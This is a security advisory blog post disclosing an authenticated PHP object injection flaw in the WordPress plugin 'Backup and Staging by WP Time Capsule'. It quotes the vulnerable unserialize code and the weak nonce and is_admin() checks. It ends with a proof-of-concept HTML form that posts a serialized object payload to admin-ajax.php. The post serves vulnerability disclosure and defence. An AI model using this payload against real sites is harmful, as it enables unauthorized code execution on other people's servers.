14 Aug

Authenticated PHP Object Injection Vulnerability in Backup and Staging by WP Time Capsule

With WordPress plugins that should have obvious heightened security risk we have often found that the security is poor, maybe even poorer that the average plugin. The authenticated PHP object injection vulnerability we ran across in the plugin Backup and Staging by WP Time Capsule is a good example of that insecurity.

On Friday there was a security change made related to PHP object injection to one of the most popular WordPress plugins, Formidable Forms, which has 200,000+ installs. The relevant code seemed to be something that should have been flagged by our Plugin Security Checker and proactive monitoring, but we found that it wasn’t due to usage of an alternate function to what is usually used with vulnerable code. Its usage is so uncommon that according to a search of all the plugins in the WordPress Plugin Directory using WPdirectory it was only one of three with the same basic set up. One of the other plugins was Backup and Staging by WP Time Capsule. At first glance the code in that plugin looked like it would of limited security concern, but further checking showed multiple security failures allow anyone logged in to WordPress that can access the admin area is able to exploit it.

The plugin register the function get_g_drive_authorize_url_wptc() to be accessible through WordPress’ AJAX functionality to those logged in to WordPress:

2247
add_action('wp_ajax_get_g_drive_authorize_url_wptc', 'get_g_drive_authorize_url_wptc');

That function will call the function set_refresh_token_g_drive():

2390
2391
2392
2393
2394
2395
2396
function get_g_drive_authorize_url_wptc() {
 
	WPTC_Base_Factory::get('Wptc_App_Functions')->verify_ajax_requests();
 
	set_server_req_wptc();
	$config = WPTC_Factory::get('config');
	if(set_refresh_token_g_drive($config) !== false){

That function will unserialize the value of the POST input “credsData[g_drive_refresh_token]”, which permits PHP objection to occur:

2413
2414
2415
2416
2417
2418
2419
2420
2421
2422
2423
2424
2425
2426
2427
2428
function set_refresh_token_g_drive(&$config){
	if (empty($_POST['credsData'])) {
		return false;
	}
 
	if (empty($_POST['credsData']['g_drive_refresh_token'])) {
		return false;
	}
	wptc_log($_POST, '---------------$_POST-----------------');
	wptc_log(wp_unslash($_POST['credsData']['g_drive_refresh_token']), '---------------wp_unslash($_POST[credsData g_drive_refresh_token])-----------------');
	$config->set_option('default_repo', 'g_drive');
	$config->set_option('oauth_state_g_drive', 'access');
	$config->set_option('gdrive_old_token', wp_unslash($_POST['credsData']['g_drive_refresh_token']));
	$connected_obj = WPTC_Factory::get('g_drive');
	$email = trim($config->get_option('main_account_email', true));
	$refresh_token_arr = unserialize(wp_unslash($_POST['credsData']['g_drive_refresh_token']));

Before that function gets called the function verify_ajax_requests() needs to return true though, which you would assume would limit access the code. That function attempts to do two security checks, though fails at one:

226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
public function verify_ajax_requests($admin_check = true){
 
	//verify its ajax request
	if (empty($_POST['action'])) {
		return false;
	}
 
 
	//Verifies the Ajax request to prevent processing requests external of the site
	check_ajax_referer( 'wptc_nonce', 'security' );
 
	if (!$admin_check) {
		return true;
	}
 
	//Check request made by admin
	if (!is_admin()) {
		$this->die_with_msg('you are not authorized');
	}
}

The check to see if “request made by admin” will always be true for an AJAX requests, which the function’s name indicates it is meant to verify, since is_admin() always return for true for that. It would seem the check is meant to check if someone is Administrator, but that function doesn’t tell that (the confusion with that was warned about years ago and ignored).

The other check there checks if a valid nonce has been provided to prevent cross-site request forgery (CSRF). Normally access to that would be limited, but in the case of this plugin it is included on every admin page.

The reason for that starts with the registration of the function register_the_js_events_wptc() to run during “admin_enqueue_scripts”:

2204
add_action('admin_enqueue_scripts', 'register_the_js_events_wptc');

That function in turn calls the function wptc_init_nonce():

2175
2176
2177
2178
2179
2180
2181
2182
function register_the_js_events_wptc($hook) {
	wp_enqueue_style('wptc-tc-ui', plugins_url() 	. '/' . basename(dirname(__FILE__)) . '/tc-ui.css', array(), WPTC_VERSION);
	wp_enqueue_style('wptc-opentip', plugins_url() 	. '/' . basename(dirname(__FILE__)) . '/css/opentip.css', array(), WPTC_VERSION);
	wp_enqueue_script('wptc-jquery', false, array(), WPTC_VERSION);
	wp_enqueue_script('wptc-actions', plugins_url() . '/' . basename(dirname(__FILE__)) . '/time-capsule-update-actions.js', array(), WPTC_VERSION);
	wp_enqueue_script('wptc-pro-common-listener', plugins_url() . '/' . basename(dirname(__FILE__)) . '/js/ProCommonListener.js', array(), WPTC_VERSION);
 
	wptc_init_nonce();

That in turn generates the relevant nonce:

2206
2207
2208
2209
2210
2211
2212
2213
function wptc_init_nonce(){
	$params = array(
		'ajax_nonce' => wp_create_nonce('wptc_nonce'),
		'admin_url' => network_admin_url(),
	);
 
	wp_localize_script( 'wptc-actions', 'wptc_ajax_object', $params );
}

Full Disclosure

Due to the moderators of the WordPress Support Forum’s continued inappropriate behavior we are full disclosing vulnerabilities in protest until WordPress gets that situation cleaned up, so we are releasing this post and then leaving a message about that for the developer through the WordPress Support Forum. You can notify the developer of this issue on the forum as well. Hopefully the moderators will finally see the light and clean up their act soon, so these full disclosures will no longer be needed (we hope they end soon). You would think they would have already done that, but considering that they believe that having plugins, which have millions installs, remain in the Plugin Directory despite them knowing they are vulnerable is “appropriate action”, something is very amiss with them (which is even more reason the moderation needs to be cleaned up).

Update: To clear up the confusion where developers claim we hadn’t tried to notify them through the Support Forum (while at the same time moderators are complaining about us doing just that), here is the message we left for this vulnerability:

Is It Fixed?

If you are reading this post down the road the best way to find out if this vulnerability or other WordPress plugin vulnerabilities in plugins you use have been fixed is to sign up for our service, since what we uniquely do when it comes to that type of data is to test to see if vulnerabilities have really been fixed. Relying on the developer’s information, can lead you astray, as we often find that they believe they have fixed vulnerabilities, but have failed to do that.

Proof of Concept

With our plugin for testing for PHP object injection installed and activated, the following proof of concept will cause the message “PHP object injection has occurred.” be shown, when logged in to WordPress.

Make sure to replace “[path to WordPress]” with the location of WordPress and “[nonce]” with the value of the nonce listed on the line that begins “var wptc_ajax_object” in the source code of an admin page.

<html>
<body>
<form action="http://[path to WordPress]/wp-admin/admin-ajax.php?action=get_g_drive_authorize_url_wptc" method="POST">
<input type="hidden" name="security" value="[nonce]" />
<input type="hidden" name="credsData[g_drive_refresh_token]" value='O:20:"php_object_injection":0:{}' />
<input type="submit" value="Submit request" />
</form>
</body>
</html>

Concerned About The Security of the Plugins You Use?

When you are a paying customer of our service, you can suggest/vote for the WordPress plugins you use to receive a security review from us. You can start using the service for free when you sign up now. We also offer security reviews of WordPress plugins as a separate service.